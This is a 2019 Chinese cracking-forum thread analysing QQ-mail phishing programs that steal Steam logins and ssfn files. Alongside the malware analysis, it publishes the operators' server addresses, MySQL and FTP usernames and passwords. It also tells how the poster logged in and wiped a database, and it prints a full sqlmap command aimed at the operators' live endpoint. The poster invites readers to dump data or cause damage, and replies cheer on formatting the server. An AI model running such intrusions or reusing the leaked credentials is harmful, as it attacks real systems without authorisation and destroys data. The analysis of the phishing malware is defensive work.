吾爱破解 - LCG - LSG |安卓破解|病毒分析|破解软件|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

领取今日签到奖励
查看: 8294|回复: 252
上一主题 下一主题

[PC样本分析] 群邮件钓鱼软件的简单分析并拿到后台

    [复制链接]
跳转到指定楼层
楼主
发表于 2019-3-2 12:04 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
本帖最后由 xuing 于 2019-3-16 12:47 编辑



不知道从何时起,qq群邮件就成为了钓鱼软件传播的一个绝佳场所,什么”萌妹变声器”,“破解UU加速器”。
我偶尔闲的无聊的时候,就会下载下来耗费几分钟逆(ti)向(chuan)一下.发现钓鱼软件总是要把自己服务器的账号密码写到软件里面。

现在我们来一起捋一捋这个事情。
首先,这些钓鱼软件会通过控件覆盖的方式盗取Steam账号密码,并且为了过Steam的安全验证需要将ssfn开头的授权文件上传到病毒作者服务器。


这个文件



控件覆盖


可以看到,这里的两个输入框和登录按钮都不是Steam自身的。
并且是浮在空中的。

然后通过腾讯快速登录的“漏洞”,即通过本地的“localhost.ptlogin2.qq.com”,拿到cookies和token相关的登录信息,借此可以群发邮件,强行加好友,加群,发表说说等。这块有很多人都聊过了,原理也不算难。网上资料很多,我就不在此赘述了。

下图,画圈的部分,就是批量发送群邮件相关的字符串。

字符串提取

其中,http://www.laohe788.com/zhuti.txt为邮件标题。
http://www.laohe788.com/zhengwen.txt为邮件内容

这么多钓鱼软件,我简单分析了一下,稍微见证了下作者的成长。

1月9号左右,作者传输盗号信息(俗称收信)是通过直接使用远程访问mysql服务器,执行sql语句(insert into xxx)来实现的。
其中mysql的账号密码,并没有在软件中明文存储,做了混淆,直接IDA提串是看不到的。

下图是用火绒剑抓到的登录数据包。

火绒剑截图

上图中的a1214170409,分别是mysql账号和数据库名。

根据Mysql的登录协议,密码不会直接明文传输的。所以通过火绒剑、Wireshark这类软件虽然可以抓到登录数据包,但是并不能直接看到数据库密码。
所以这里需要使用OD调试,拿到的账号密码如下:

OD调用栈


服务器地址 host1.webhostidc.net
当时指向的ip为:103.234.97.196
账号以及数据库名均为:a1214170409。
密码为:7a7ef802

当时的部分截图如下:


我帮他把数据库了清空一下,就没管了。接下来,1月16号开始,作者就更换为PHP收信了。我以为他学聪明了...不会把自己的账号密码再放到程序里了,结果他为了传输Steam的ssfn授权文件,把自己的ftp账号密码写在了程序里面...

这时他的信息如下:

服务器地址:host1.webhostidc.net
收信网址:www.sk404.com/muma/jianpanjilu.php
账号:yy4961627321
密码:C7A1E537B84be3

这个时候数据库内容没截图。现在已经登不上了。


所以直接看近期的吧,2月17号的(这个也已经连不上了)

ftp服务器地址:host1.webhostidc.net
收信网址:http://www.laopohehe.top/muma/jianpanjilu.php
密码:U2z3H7X6
账号:laopoheheda

还有很多,不一一列举了,反正就是一个作者或一批人,并且死脑筋...偶尔加个Super-EC,或者加个壳。反正就是要把账号密码写到程序里。mdzz。我们看最新的(2月27号)。

FTP服务器:host1.webhostidc.net
账号:laopoheheda
密码:D3271E5EFD05d6


FTP登录进去,发现这zz的ftp服务器、mysql服务器和http服务器都是一台,ftp就可以看到http服务器的所有php文件了,查看config.php,可以看到mysql的账号密码

config.php
最新的另一个。


服务器:103.214.169.225
账号:laopohehe
密码:U2z3H7X6


这个的数据库账号密码是相同的。话说看这些命名。可以确定是一伙人在作案。希望这些信息的曝光,可以增加他们的一些犯罪成本。

接下来是钓鱼软件内无账号密码

这种钓鱼软件内无账号密码的,我就看到一个...
www.lanzouyundown.com里面下载的“Apex英雄Origin解除限速”为例。提取字符串,没有发现账号密码相关的字符串,因为内部使用了Super-EC模块,怀疑是中途解密的,使用OllyDbg进行调试并辅以Wireshark进行抓包。

抓包图


可以看到,这个http请求中,shuju1代表snfn名称。(然后name和pass,我初步猜测是用于区分是手下哪个小弟盗的,因为可以通过这个直接在网页中获取数据)

shuju4是什么呢?既然没有看到有ftp相关的流量,调试中也没有发现。会不会这就是ssfn文件的16进制表示呢。使用010editor打开本地的snfn文件,

010editor


可以发现和流量包中shuju4字段的内容是一致的。作者终于不使用ftp来传输文件了

那就需要别的思路了。把主站(www.sk408.com)拿AWVS和御剑什么的简单扫了一下,发现是DedeCMS的系统,版本是V57_SP2。找了一下相关漏洞,但是member功能关闭了,没有利用成功。后台简单扫了一下没扫出来,爆破后台的漏洞似乎也修复了。(最后通过他自己的描述找到了后台地址:www.sk408.com/suyi_ht/)

作者用于记录数据的php文件为www.sk408.com/muma/jianpanjilu.php
然后,根据之前我们ftp中得到的php文件,我们可以做一下简单的代码审计。

jianpanjilu.php源代码


sql语句是拼装的,也没做任何的检查或过滤。直接上sqlmap,一把梭。
sqlmap -u "http://www.sk408.com/muma/jianpanjilu.php" --data "name=123&pass=123&username=qwe&password=qwe&ip=2.2.2.2&shuju1=123&shuju2=qwe&shuju3=qwe" --tamper=space2comment --random-agent --level 3 --dbs


数据库信息


服务器信息
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17


数据库账号是shikong,但是不是DBA权限。所以没办法读取密码。不过数据库是可以dump下来的,也可以搞些破坏,大家可以自己玩。

如果找到了其他漏洞,欢迎交流。


相关样本下载地址;
www.lanzouyundown.com
www.Laohe788.com
www.ob718.com
www.45a6.cn
www.ob408.com
www.lanzouwangpan.com

钓鱼后台源码.zip

3.78 KB, 下载次数: 205, 下载积分: 吾爱币 -1 CB

钓鱼后台源码

免费评分

参与人数 126吾爱币 +125 热心值 +117 收起 理由
阿里嘎多萨米思 + 1 + 1 谢谢@Thanks!
1yttoni + 1 + 1 用心讨论,共获提升!
zhangfuzz + 1 用心讨论,共获提升!
Mr.Eleven + 1 谢谢@Thanks!
那一年的白洁啊 + 1 热心回复!
Jayzyyzyy + 1 + 1 大神!!
老白啊 + 1 + 1 厉害了我就经常收这种东西
TX520 + 1 + 1 用心讨论,共获提升!
6590217 + 1 我很赞同!
xiong_online + 1 + 1 用心讨论,共获提升!
m9kjteam + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
1372_7 + 1 + 1 用心讨论,共获提升!
zhuxiatong + 1 + 1 用心讨论,共获提升!
ichiban123 + 1 + 1 牛掰
diditang + 1 + 1 真神
余白 + 1 我很赞同!
dong12306 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
Neal-l + 1 + 1 我很赞同!
scccccc + 1 谢谢@Thanks!
dangzijia123 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
专属小可爱 + 1 + 1 热心回复!
idea + 1 + 1 鼓励转贴优秀软件安全工具和文档!
Loongten + 1 热心回复!
61454009 + 1 + 1 技术宅好帅TAT
Ascetic + 1 + 1 我很赞同!
墨狂之逸才 + 1 + 1 我很赞同!源码果然很有意思
晓坡 + 1 用心讨论,共获提升!
bingtangbing + 1 + 1 用心讨论,共获提升!
/bq + 1 + 1 估计发毒的看了之后会一直骂自己SB吧
woditian + 1 + 1 膜拜大佬!看完竟有点同情那个作者
wangbingbing + 1 + 1 膜拜大佬,学习了
sheldon_wxd + 1 + 1 这个教学直接啊。牛BAI
云若风 + 1 + 1 我很赞同!
liuxianjun + 1 + 1 我很赞同!
ko2o3 + 1 + 1 我很赞同!
五河星空 + 1 + 1 热心回复!
makefli + 1 + 1 我很赞同!
pnl2019 + 1 + 1 我滴妈呀,大佬,膜拜
悄悄的动手 + 1 谢谢@Thanks!
一袋米要抗几楼 + 1 + 1 我很赞同!
4AMGodVzzZ + 1 谢谢@Thanks!
lgchhh + 1 + 1 谢谢@Thanks!
梦听蝶语 + 1 + 1 感谢楼主的分享,作者怕是要哭,嘻嘻
千百度° + 1 + 1 用心讨论,共获提升!
ImrPZ + 1 + 1 这是真大佬 我要关注你!
饮源 + 1 + 1 用心讨论,共获提升!
ZHANZHl + 1 + 1 用心讨论,共获提升!
pushaojie + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
gqboy + 1 + 1 我很赞同!
wudeng666 + 1 + 1 用心讨论,共获提升!
yixi + 1 + 1 谢谢@Thanks!
bdcpc + 1 + 1 鼓励转贴优秀软件安全工具和文档!
无欲无求 + 1 用心讨论,共获提升!
qwer1193 + 1 + 1 谢谢@Thanks!
江南小公子 + 1 用心讨论,共获提升!
叹息之華 + 1 + 1 用心讨论,共获提升!
金社郎君 + 1 + 1 谢谢@Thanks!
梓涵 + 1 + 1 热心回复!
coolllyy + 1 + 1 我很赞同!
siuhoapdou + 1 + 1 谢谢@Thanks!
登高回眸 + 1 + 1 用心讨论,共获提升!
BlackCicada + 1 + 1 我很赞同!
jinchenye + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
youhen233 + 1 + 1 谢谢@Thanks!
东门拉风 + 1 + 1 用心讨论,共获提升!
Ganlv + 3 用心讨论,共获提升!
13041067526 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
炫宇 + 1 + 1 大佬大佬!!!收徒吗
jnez112358 + 1 + 1 谢谢@Thanks!
星猫 + 1 谢谢@Thanks!
luckyblyd + 1 热心回复!
yuyuyu13 + 1 鼓励转贴优秀软件安全工具和文档!
poisonbcat + 1 + 1 谢谢@Thanks!
EsToi + 1 + 1 鼓励转贴优秀软件安全工具和文档!
猫吃 + 1 + 1 请问一下 我如果进了别人库,把他库删了,要承担什么法律责任嚒?
claude.chen + 1 + 1 热心回复!
Ev1 + 1 + 1 用心讨论,共获提升!
mangos + 1 + 1 用心讨论,共获提升!
hmily4311 + 1 + 1 谢谢@Thanks!
as8680 + 2 + 1 这个作者主要传播途径是小刀网,大家一起去举报,灭了这团队
52Sql1920 + 1 + 1 热心回复!
嗜血微风 + 1 + 1 我很赞同!
Andrewshihs + 1 + 1 鼓励转贴优秀软件安全工具和文档!
靓仔胖哥 + 1 + 1 热心回复!
z1234567890 + 1 + 1 我很赞同!
GCaptain + 1 + 1 用心讨论,共获提升!
RoB1n_Ho0d + 1 热心回复!
byytmz + 1 + 1 原来这钓鱼过程这么精彩
zin8 + 1 + 1 好精彩的过程,看着过瘾!!自己也试着破解一下~
gomg007 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
wxy710923 + 1 + 1 我很赞同!
独行风云 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
XhyEax + 1 + 1 我很赞同!
sxlixiaoyang + 2 + 1 靳富良 快来看看 你的钓鱼网站被人一锅端了
2220209876 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
howsk + 1 + 1 对方有苦说不出
蜗牛快跑 + 1 + 1 我被这个给害了。。
w4526423 + 2 + 1 鼓励转贴优秀软件安全工具和文档!
Romeo2000 + 1 + 1 我很赞同!
w0r1d3e + 1 谢谢@Thanks!

查看全部评分

本帖被以下淘专辑推荐:

发帖求助前要善用论坛搜索功能,那里可能会有你要找的答案;

如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子分类或者标题加上【已解决】

如何回报帮助你解决问题的坛友,一个好办法就是给对方加【热心】,加分不会扣除自己的积分,做一个热心并受欢迎的人!

推荐
 楼主| 发表于 2019-3-16 12:43 |楼主
yuyunfz 发表于 2019-3-16 12:17
其实我没看懂太多,部分的还是能懂的,抓包这块真心没懂

这块我没展开说,根据mysql的握手协议(即登录),我的理解是这样的,不一定完全正确。服务器存储的是密码的SHA1哈希值(以保证密码不是明文存储)。

登录时,首先服务器会传送一个Salt给客户端,客户端收到salt后会和Sha1后的密码进行组合,然后一起再算一次SHA1。将这个发送给服务器。这时服务器就可以将自己存储的散列(Sha1一次的密码)也和客户端做一样的处理,再判断过来的值是否一致。

具体可以看Handshake的实现。我也不是很清楚。每个版本可能也有不同。

你只需要了解一点,Mysql在登录时没有把密码进行明文传送,所以抓包可以抓到用户名和数据库名,但是抓不到密码。必须要调试或者IDA分析。
推荐
发表于 2019-3-4 20:54
willJ 发表于 2019-3-4 09:37
哈哈哈,你这么一搞,对方又要做技术升级了。

这套技术一开始是SMTP的邮箱收发,后来被搞了,之后又有了asp,php收信,之后在进化就进化出好多了,比如说ftp,mysql什么的,但是最不好搞的还是那些.php直接收信的,基本上那些主机都在国外, 很难搞。。。
沙发
 楼主| 发表于 2019-3-2 12:17 |楼主
本帖最后由 xuing 于 2019-3-2 12:27 编辑

沙发自己占了..排版和文字都不是很好,大家将就看吧(捂脸
3#
发表于 2019-3-2 12:19
当初拿到ftp权限的时候就应该提权服务器格盘的
4#
发表于 2019-3-2 12:29
2333难怪我收到的那些邮件标题差不多,原来是同一个人干的
5#
发表于 2019-3-2 12:43
收到信息就屏蔽群邮件了,还是大老牛逼
6#
发表于 2019-3-2 12:44
很强了好不好,
7#
发表于 2019-3-2 12:50
laopohehe 老破呵呵
8#
发表于 2019-3-2 12:57
收到信息就屏蔽群邮件了,还是大老牛逼
9#
发表于 2019-3-2 13:05
小白表示膜拜
10#
发表于 2019-3-2 13:07
你不把他服务器破坏了,真是对不起小白啊,
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则


免责声明:
吾爱破解所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

Mail To:Service@52PoJie.Cn

快速回复 收藏帖子 返回列表 搜索

RSS订阅|手机版|小黑屋|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2019-3-20 15:00

Powered by Discuz!

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表